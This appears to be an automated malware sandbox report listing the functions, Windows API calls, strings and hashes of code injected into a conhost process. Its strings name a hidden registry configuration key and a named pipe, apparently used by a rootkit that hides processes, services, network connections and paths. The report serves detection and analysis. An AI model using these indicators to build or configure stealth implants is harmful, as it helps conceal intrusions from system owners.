Part of subcall function 000001FD186D12B8: HeapAlloc.KERNEL32 ref: 000001FD186D13E9
Part of subcall function 000001FD186D12B8: GetProcessHeap.KERNEL32 ref: 000001FD186D1406
Part of subcall function 000001FD186D12B8: HeapFree.KERNEL32 ref: 000001FD186D1414
Part of subcall function 000001FD186D12B8: lstrlenW.KERNEL32 ref: 000001FD186D141D
Part of subcall function 000001FD186D12B8: GetProcessHeap.KERNEL32 ref: 000001FD186D142B
Part of subcall function 000001FD186D12B8: HeapAlloc.KERNEL32 ref: 000001FD186D1439

Strings

startup, xrefs: 000001FD186D17D1
pid, xrefs: 000001FD186D180E
service_names, xrefs: 000001FD186D18BF
process_names, xrefs: 000001FD186D1849
SOFTWARE\$rbx-config, xrefs: 000001FD186D178E
tcp_remote, xrefs: 000001FD186D1935
tcp_local, xrefs: 000001FD186D18FA
udp, xrefs: 000001FD186D1970
paths, xrefs: 000001FD186D1884

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3414887735
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 6155920c71ca2ebb6c97a957404cbe3e020f04d01e4f924df8d1b4d97458db36
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: 6E712936714F52C5EB10DF66F8566F863A6FB88B88F405222EE8D47B68EE74C544C340

Function 000001FD186D12B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001FD186D1315
GetProcessHeap.KERNEL32 ref: 000001FD186D1323
HeapAlloc.KERNEL32 ref: 000001FD186D1334
RegEnumValueW.ADVAPI32 ref: 000001FD186D1393

Part of subcall function 000001FD186D1530: StrCmpIW.SHLWAPI ref: 000001FD186D1561

GetProcessHeap.KERNEL32 ref: 000001FD186D13DB
HeapAlloc.KERNEL32 ref: 000001FD186D13E9
GetProcessHeap.KERNEL32 ref: 000001FD186D1406
HeapFree.KERNEL32 ref: 000001FD186D1414
lstrlenW.KERNEL32 ref: 000001FD186D141D
GetProcessHeap.KERNEL32 ref: 000001FD186D142B
HeapAlloc.KERNEL32 ref: 000001FD186D1439
StrCpyW.SHLWAPI ref: 000001FD186D145B
GetProcessHeap.KERNEL32 ref: 000001FD186D1472
HeapFree.KERNEL32 ref: 000001FD186D1480

Strings

d, xrefs: 000001FD186D1356

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 6070d05ce7a78b6cec79fc5aea522934f27cdff32950988d2ae75df2b5cb5391
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 40512972618B85DAE724CF62F4493FAB7A2F788B98F444124EA8907758EF78C0498740

Function 000001FD186DEF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,000001FD186DF34A,?,?,00000000,000001FD186DF2CD), ref: 000001FD186DEFF5
GetLastError.KERNEL32(?,?,00000000,000001FD186DF2CD), ref: 000001FD186DF007
LoadLibraryExW.KERNEL32(?,?,00000000,000001FD186DF2CD), ref: 000001FD186DF049
VirtualProtect.KERNEL32 ref: 000001FD186DF0A5
VirtualProtect.KERNEL32 ref: 000001FD186DF0D6
FreeLibrary.KERNEL32(?,?,00000000,000001FD186DF2CD), ref: 000001FD186DF11A
GetProcAddress.KERNEL32(?,?,00000000,000001FD186DF2CD), ref: 000001FD186DF126

Strings

api-ms-, xrefs: 000001FD186DF01B
AppPolicyGetProcessTerminationMethod, xrefs: 000001FD186DF157, 000001FD186DF165
ext-ms-, xrefs: 000001FD186DF02E

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 00c971099dfa2af5f654d9f0a4da4450f70729cbfe40cd0d22d2854168fa4743
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: DB519B31709B4691EB25DB66F8123F92292AB48BB0F980735EEBD473D4EF38D5458640

Function 000001FD186D33A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 000001FD186D33FD
GetProcessHeap.KERNEL32 ref: 000001FD186D3412
HeapAlloc.KERNEL32 ref: 000001FD186D3420
PdhGetCounterInfoW.PDH ref: 000001FD186D3436
StrCmpW.SHLWAPI ref: 000001FD186D344B

Part of subcall function 000001FD186D3950: StrCmpNW.SHLWAPI ref: 000001FD186D3972
Part of subcall function 000001FD186D3950: StrStrW.SHLWAPI ref: 000001FD186D3990
Part of subcall function 000001FD186D3950: StrToIntW.SHLWAPI ref: 000001FD186D39B7

GetProcessHeap.KERNEL32 ref: 000001FD186D3488
HeapFree.KERNEL32 ref: 000001FD186D3496

Strings

\GPU Engine(*)\Running Time, xrefs: 000001FD186D3444

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: b9029fdfeaebb1a88348b3aa5e87bd8e39f2de0f11980809c975446d71cf7dba
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: 17319532608B4296E721DF12BA097F9A3A2F788BD5F444635EE8943A25FF3CC555C740

Function 000001FD186D34B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PdhGetCounterInfoW.PDH ref: 000001FD186D3516
GetProcessHeap.KERNEL32 ref: 000001FD186D3527
HeapAlloc.KERNEL32 ref: 000001FD186D3535
PdhGetCounterInfoW.PDH ref: 000001FD186D354B
StrCmpW.SHLWAPI ref: 000001FD186D3560

Part of subcall function 000001FD186D3950: StrCmpNW.SHLWAPI ref: 000001FD186D3972
Part of subcall function 000001FD186D3950: StrStrW.SHLWAPI ref: 000001FD186D3990
Part of subcall function 000001FD186D3950: StrToIntW.SHLWAPI ref: 000001FD186D39B7

GetProcessHeap.KERNEL32 ref: 000001FD186D358D
HeapFree.KERNEL32 ref: 000001FD186D359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 000001FD186D3559

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 4b664cd42b913219de104dcde409d9e938acde5a05321eda99dbf70d8baf0303
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 74316D32618B468AEB51DF22B989BB963A2F784F94F444235EE8A43764FF38D445C700

Function 000001FD186DA22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001FD186DA289

Part of subcall function 000001FD186DB144: __GetUnwindTryBlock.LIBCMT ref: 000001FD186DB187
Part of subcall function 000001FD186DB144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001FD186DB1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001FD186DA361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001FD186DA5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001FD186DA6BC

Strings

csm, xrefs: 000001FD186DA2A3
csm, xrefs: 000001FD186DA384
csm, xrefs: 000001FD186DA30A

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction ID: c3f29b12cb11323441d62ebf54340846cef36deda9eeace847a71c5cef989b7f
Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
Instruction Fuzzy Hash: 9ED1697260CB828AEB20DF65E4423FD77A2F749799F140225FAC957B9ADB38C581C740

Function 000001FD1776962C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 000001FD17769689

Part of subcall function 000001FD1776A544: __GetUnwindTryBlock.LIBCMT ref: 000001FD1776A587
Part of subcall function 000001FD1776A544: __SetUnwindTryBlock.LIBVCRUNTIME ref: 000001FD1776A5AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 000001FD17769761
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 000001FD177699AF
std::bad_alloc::bad_alloc.LIBCMT ref: 000001FD17769ABC

Strings

csm, xrefs: 000001FD177696A3
csm, xrefs: 000001FD17769784
csm, xrefs: 000001FD1776970A

Memory Dump Source

Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction ID: c833f3c356e7633042ce7e2d69c88d9189a25d30b0a0bfa4bcebdae77743eb7a
Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
Instruction Fuzzy Hash: 1CD18E7260874286FB60DF65E4803FD77A6F785788F150129FE8957BAADB34C199CB00

Function 000001FD186D104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99
memoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001FD186D10B1
RegEnumValueW.ADVAPI32 ref: 000001FD186D1117
GetProcessHeap.KERNEL32 ref: 000001FD186D115A
HeapAlloc.KERNEL32 ref: 000001FD186D1168
GetProcessHeap.KERNEL32 ref: 000001FD186D1185
HeapFree.KERNEL32 ref: 000001FD186D1193

Strings

d, xrefs: 000001FD186D10D6

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction ID: 2e1f89e6b044ab31fb4021e6882f0b9b2078b424f76657dc0c4e5f991cdca685
Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
Instruction Fuzzy Hash: 73413173218B85D6E760CF61F4457AEB7A2F388B98F448229EA8907758DF78C549CB40

Function 000001FD186D2518 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 44
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001FD186D252D
GetCurrentProcessId.KERNEL32 ref: 000001FD186D2537
CreateFileW.KERNEL32 ref: 000001FD186D2568
WriteFile.KERNEL32 ref: 000001FD186D2590
ReadFile.KERNEL32 ref: 000001FD186D25AF
CloseHandle.KERNEL32 ref: 000001FD186D25B8

Strings

\\.\pipe\$rbx-childproc, xrefs: 000001FD186D2549

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
String ID: \\.\pipe\$rbx-childproc
API String ID: 166002920-1828357524
Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction ID: 58cec68ccc87552e091eaaeaabba7b2ad6ad878a901c7428d44c2eafc5d77b36
Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
Instruction Fuzzy Hash: 8E114932618B41C2E710CB21F4197BA7762F389BE4F940325FAA902BA8DF3CC148CB40

Function 000001FD186D7C50 Relevance: 12.2, APIs: 8, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001FD186D7C78
__scrt_acquire_startup_lock.LIBCMT ref: 000001FD186D7CCA
_RTC_Initialize.LIBCMT ref: 000001FD186D7CF8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001FD186D7D1E
__scrt_release_startup_lock.LIBCMT ref: 000001FD186D7D49

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: 34db221c4c0f1798f9a68a85379843058ceab2d2f705c3cff04bd1b3f569e08c
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: A381E33060C7878AFB60EB66B8473F96293AB95784F544635FA8847797EF3CC8458702

Function 000001FD17767050 Relevance: 12.2, APIs: 8, Instructions: 227COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001FD17767078
__scrt_acquire_startup_lock.LIBCMT ref: 000001FD177670CA
_RTC_Initialize.LIBCMT ref: 000001FD177670F8
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001FD1776711E
__scrt_release_startup_lock.LIBCMT ref: 000001FD17767149

Memory Dump Source

Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction ID: b735b32b1f6716178ab04521b22a214dc531adb1f6ac33b232243ed7e21c43dc
Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
Instruction Fuzzy Hash: 8C81A07160C24386FB54AB26B8453F9B293BB85BC0F574135BD09477BEFA28C84DC680

Function 000001FD186D9AAC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9B31
GetLastError.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9B3F
LoadLibraryExW.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9B69
FreeLibrary.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9BD7
GetProcAddress.KERNEL32(?,?,?,000001FD186D9C6B,?,?,?,000001FD186D945C,?,?,?,?,000001FD186D8F65), ref: 000001FD186D9BE3

Strings

api-ms-, xrefs: 000001FD186D9B51

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction ID: 3775903223ae0254dd630df5e3474f4edae8440032e26e54aafb7e0d420811af
Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
Instruction Fuzzy Hash: 0031893121AB4691EF12DB06B8027FA23D7BB99BA0F5A0735FD994B790EF38C4448310

Function 000001FD186E3400 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001FD186E3431
GetLastError.KERNEL32 ref: 000001FD186E343D
CloseHandle.KERNEL32 ref: 000001FD186E3455
CreateFileW.KERNEL32 ref: 000001FD186E3480
WriteConsoleW.KERNEL32 ref: 000001FD186E349F

Strings

CONOUT$, xrefs: 000001FD186E3461

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction ID: c11ac30b84616d8325414a174eed086a2ca02e3dc7b2aaede2d6892440df347f
Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
Instruction Fuzzy Hash: 66118F31318B4186E750CB52F85A7B977A2F788FE4F444234EA5E87BA4EF39C9148740

Function 000001FD186D6270 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001FD186D62AB
GetThreadContext.KERNEL32 ref: 000001FD186D6415

Part of subcall function 000001FD186D60A0: GetCurrentThreadId.KERNEL32 ref: 000001FD186D60A4

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Thread$Current$Context
String ID:
API String ID: 1666949209-0
Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction ID: bda03f5232f3874a2593e06c0a17ce4b2d7dca494f667715eda564b2b0f83b24
Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
Instruction Fuzzy Hash: C0D18A36208B8985DB70DB1AF4953BA77A1F388B88F104226EACD477A9DF3DC551CB41

Function 000001FD186D2098 Relevance: 9.1, APIs: 6, Instructions: 113threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 000001FD186D20A6
TlsFree.KERNEL32 ref: 000001FD186D225F
TlsFree.KERNEL32 ref: 000001FD186D226B
TlsFree.KERNEL32 ref: 000001FD186D2277
TlsFree.KERNEL32 ref: 000001FD186D2283
TlsFree.KERNEL32 ref: 000001FD186D228F

Part of subcall function 000001FD186D5E50: GetCurrentThreadId.KERNEL32 ref: 000001FD186D5E66

Memory Dump Source

Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true

Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd

Similarity

API ID: Free$CurrentThread
String ID:
API String ID: 564911740-0
Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
